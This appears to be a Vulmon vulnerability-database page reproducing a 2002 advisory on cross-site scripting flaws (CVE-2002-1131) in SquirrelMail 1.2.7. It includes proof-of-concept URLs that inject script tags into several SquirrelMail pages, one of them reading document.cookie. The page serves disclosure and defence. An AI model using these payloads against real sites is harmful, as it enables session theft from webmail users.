Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2002-1131

Publish Date: 19 Sep 2002

                source: http://www.securityfocus.com/bid/5763/info

SquirrelMail is a feature rich webmail program implemented in the PHP4 language. It is available for Linux and Unix based operating systems.

Multiple cross site scripting vulnerabilities have been discovered in various PHP scripts included with SquirrelMail. By including embedded commands into a malicious link, it is possible for an attacker to execute HTML and script code on a web client in the context of the site hosting the webmail system.

This issue was reported for SquirrelMail 1.2.7, earlier versions may also be affected. 


http://&lt;VULNERABLE
SITE&gt;.net/webmail/src/addressbook.php?"&gt;&lt;script&gt;alert(document.cookie)&lt;/scri
pt&gt;&lt;!--

http://&lt;VULNERABLE
SITE&gt;.net/webmail/src/options.php?optpage=&lt;script&gt;alert('boop!')&lt;/script&gt;

http://&lt;VULNERABLE
SITE&gt;.net/webmail/src/search.php?mailbox=&lt;script&gt;alert('boop!')&lt;/script&gt;&amp;wha
t=x&amp;where=BODY&amp;submit=Search

http://&lt;VULNERABLE
SITE&gt;.net/webmail/src/search.php?mailbox=INBOX&amp;what=x&amp;where=&lt;script&gt;alert('b
oop!')&lt;/script&gt;&amp;submit=Search

http://&lt;VULNERABLE
SITE&gt;.net/webmail/src/help.php?chapter=&lt;script&gt;alert('boop!')&lt;/script&gt;

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

SquirrelMail 1.2.6/1.2.7 - Multiple Cross-Site Scripting Vulnerabilities

Vulmon Search

About

Products

Connect